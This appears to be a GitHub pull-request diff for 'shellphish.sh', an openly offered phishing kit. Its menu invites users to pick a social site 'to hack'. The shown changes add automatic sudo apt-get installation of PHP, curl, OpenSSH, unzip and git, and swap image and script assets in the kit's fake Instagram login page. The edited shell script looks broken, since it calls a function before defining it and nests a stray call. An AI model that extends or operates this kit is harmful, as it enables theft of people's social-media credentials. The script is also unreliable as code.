Skip to content
Open
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
86 changes: 80 additions & 6 deletions shellphish.sh
100644 → 100755
Original file line number Diff line number Diff line change
Expand Up @@ -5,16 +5,86 @@

# Join Telegram Group for help: http://t.me/linux_repo


trap 'printf "\n";stop;exit 1' 2
trap 'printf "\n"; stop; exit 1' 2

dependencies() {
command -v php > /dev/null 2>&1 || { echo >&2 "PHP is not installed ! Install it."; exit 1; }
command -v curl > /dev/null 2>&1 || { echo >&2 "Curl is not installed ! Install it."; exit 1; }
command -v ssh > /dev/null 2>&1 || { echo >&2 "Openssh is not installed ! Install it"; exit 1; }
command -v unzip > /dev/null 2>&1 || { echo >&2 "Unzip is not installed ! Install it"; exit 1; }
# Check and install dependencies if not installed
install_dependencies() {
echo "Installing missing dependencies..."

# Install PHP
if ! command -v php > /dev/null 2>&1; then
echo "PHP is not installed. Installing PHP..."
sudo apt-get install -y php || { echo "Failed to install PHP"; exit 1; }
fi

# Install Curl
if ! command -v curl > /dev/null 2>&1; then
echo "Curl is not installed. Installing Curl..."
sudo apt-get install -y curl || { echo "Failed to install Curl"; exit 1; }
fi

# Install OpenSSH
if ! command -v ssh > /dev/null 2>&1; then
echo "OpenSSH is not installed. Installing OpenSSH..."
sudo apt-get install -y openssh-client || { echo "Failed to install OpenSSH"; exit 1; }
fi

# Install Unzip
if ! command -v unzip > /dev/null 2>&1; then
echo "Unzip is not installed. Installing Unzip..."
sudo apt-get install -y unzip || { echo "Failed to install Unzip"; exit 1; }
fi

# Install Git
if ! command -v git > /dev/null 2>&1; then
echo "Git is not installed. Installing Git..."
sudo apt-get install -y git || { echo "Failed to install Git"; exit 1; }
fi
}

# Check for dependencies
missing_dependencies=0
if ! command -v php > /dev/null 2>&1; then
echo "PHP is not installed."
missing_dependencies=1
fi
if ! command -v curl > /dev/null 2>&1; then
echo "Curl is not installed."
missing_dependencies=1
fi
if ! command -v ssh > /dev/null 2>&1; then
echo "OpenSSH is not installed."
missing_dependencies=1
fi
if ! command -v unzip > /dev/null 2>&1; then
echo "Unzip is not installed."
missing_dependencies=1
fi
if ! command -v git > /dev/null 2>&1; then
echo "Git is not installed."
missing_dependencies=1
fi

# Prompt user to install missing dependencies
if [ $missing_dependencies -eq 1 ]; then
read -p "Do you want to install the missing dependencies? (y/n): " response
if [[ "$response" =~ ^[Yy]$ ]]; then
install_dependencies
else
echo "Please install the missing dependencies manually to continue."
exit 1
fi
else
echo -e "\n" # Add space above
echo -e "\e[38;5;172mAll dependencies are installed.\e[0m" # Dark yellow color
echo -e "\n" # Add space below
fi
}

dependencies


loading() {
clear
printf "\e[1;92m"
Expand Down Expand Up @@ -85,6 +155,10 @@ printf " \e[36;1m.:. Choose any social site which you want to hack .:.\e[0m\n"
printf " \n"
}

# Main Execution
dependencies
menu

menu() {
printf " \e[1;31m[\e[0m\e[1;77m01\e[0m\e[1;31m]\e[0m\e[1;93m Facebook \e[0m\e[1;31m[\e[0m\e[1;77m11\e[0m\e[1;31m]\e[0m\e[1;93m Twitch \e[0m\e[1;31m[\e[0m\e[1;77m21\e[0m\e[1;31m]\e[0m\e[1;93m DeviantArt\e[0m\n"
printf " \e[1;31m[\e[0m\e[1;77m02\e[0m\e[1;31m]\e[0m\e[1;93m Instagram \e[0m\e[1;31m[\e[0m\e[1;77m12\e[0m\e[1;31m]\e[0m\e[1;93m Pinterest \e[0m\e[1;31m[\e[0m\e[1;77m22\e[0m\e[1;31m]\e[0m\e[1;93m Badoo\e[0m\n"
Expand Down
Binary file removed sites/instagram/index_files/001bc33056c1.jpg
Binary file not shown.
Binary file removed sites/instagram/index_files/2d9d7248af43.jpg
Binary file not shown.
Binary file removed sites/instagram/index_files/4b70f6fae447.png
Binary file not shown.
Binary file removed sites/instagram/index_files/629d23a3c7b2.jpg
Binary file not shown.
8 changes: 0 additions & 8 deletions sites/instagram/index_files/96f2557117a2.js.download

This file was deleted.

Binary file removed sites/instagram/index_files/9e7638226e17.png
Binary file not shown.
Binary file removed sites/instagram/index_files/aafd8c6b005d.jpg
Binary file not shown.
Binary file added sites/instagram/index_files/applestore-logo.png
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
1 change: 0 additions & 1 deletion sites/instagram/index_files/b67d172d5783.js.download

This file was deleted.

Binary file not shown.
22 changes: 0 additions & 22 deletions sites/instagram/index_files/d1f0f06b39df.js.download

This file was deleted.

Binary file removed sites/instagram/index_files/f06b908907d5.png
Binary file not shown.
Binary file removed sites/instagram/index_files/f55c258e826e.png
Binary file not shown.
Binary file removed sites/instagram/index_files/f5ae123ab1e2.jpg
Binary file not shown.
11 changes: 0 additions & 11 deletions sites/instagram/index_files/f9e5c0ca0804.js.download

This file was deleted.

Binary file added sites/instagram/index_files/facebook-logo.png
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file removed sites/instagram/index_files/fb48443ec9d3.png
Binary file not shown.
Binary file added sites/instagram/index_files/googleplay-logo.png
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added sites/instagram/index_files/issue-image.png
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
59 changes: 0 additions & 59 deletions sites/instagram/index_files/lY4eZXm_YWu.html

This file was deleted.

Binary file added sites/instagram/index_files/phones.png
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added sites/instagram/index_files/photo-1.png
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added sites/instagram/index_files/photo-2.png
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added sites/instagram/index_files/photo-3.png
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added sites/instagram/index_files/photo-4.png
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added sites/instagram/index_files/photo-5.png
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
190 changes: 0 additions & 190 deletions sites/instagram/index_files/sdk.js.download

This file was deleted.

Loading